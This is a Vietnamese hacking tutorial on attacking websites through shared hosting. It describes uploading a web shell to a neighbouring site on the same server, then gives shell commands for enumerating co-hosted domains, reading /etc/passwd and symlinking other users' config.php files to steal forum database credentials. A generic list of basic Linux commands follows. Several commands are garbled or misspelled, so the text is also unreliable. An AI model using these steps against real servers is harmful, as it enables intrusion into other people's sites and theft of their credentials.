Đầu tiên mình nói qua qua về hacklocal tức là hack 1 website nào đó có dùng host chạy chung 1 server. Ví dụ: Các muốn hack 1 site nào đó ae fai check xem nó nằm ở server nào, và những web nào có cùng chạy trên server đó… Sau đó khai thác các site cùng server đó xem site nào lỗi để mình có thể thực hiện đc ý đồ ở đây là upload đc công cụ hack của mình lên. Nếu có host cùng sever với bọn nó thì càng tốt, up con shell lên host của mình để local sang. Dưới đây là 1 số lệnh khi sử dụng shell: Tìm path của mấy đứa Add on domain Mã: find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E ' victim.com' Xem tên domain trên cùng 1 host: Mã: ls -la /etc/valiasescd /etc/vdomainaliases;ls -lia Trường hợp đặc biệt khi không thể xem user nằm cùng host thì ta thêm && vào: Mã: cd /etc/vdomainaliases && ls -lia Muốn biết tên user thì xài lệnh này: Mã: hocit /etc/passwd/less /etc/passwd Local sang victim: VD con shell mình là: Mã: /home/abcd/public_html/ Thì mình sẽ local sang như sau: Mã: dir home/tên user cần local/public_html Xem nội dung của file: Mã: h2m /home/tên user cần local/public_html/index.php Ví dụ mình muốn xem config của 1 forum thì dùng: Mã: ln -s /home/tên user cần local/public_html/forum/includes/config.php abc.txt abc.txt ở đây là file bạn tạo ra trên host của bạn để xem file của người khác ! Nếu bạn sử dụng ko được các lệnh trên tức là server đã disable chức năng đó. Sẽ update thêm. Thêm 1 số lệnh shell trong linux: - pwd: đưa ra ngoài màn hình thư mục đang hoạt động (Ex: /etc/ssh). - cd: thay đổi thư mục (Ex: cd news – vào thư mục /news). - ls: đưa ra danh sách nội dung thưmục. - mkdir: tạo thư mục mới (mkdir ten_thumuc). - touch: tạo file mới (touch ten_file). - rmdir: bỏ một thư mục (rmdir ten_thumuc). - cp: copy file hoặc thư mục (cp file_nguồn file_đích). - rm: loại bỏ file (rm tên_file). - mv: di chuyển file hoặc thư mục; cũng được dùng để đặt lại tên file hoặc thư mục (mv vị_trí_cũ vị_trí_mới hoặc mv tên_cũ tên_mới). Để tìm kiếm file, bạn có thể dùng: - find : dùng cho các tên file. - grep < tiêu chuẩn tìm kiếm>: để tìm nội dung trong file. Để xem một file, bạn có thể dùng: - more : hiển thị file theo từng trang. h2m < tên file>: hiển thị tất cả file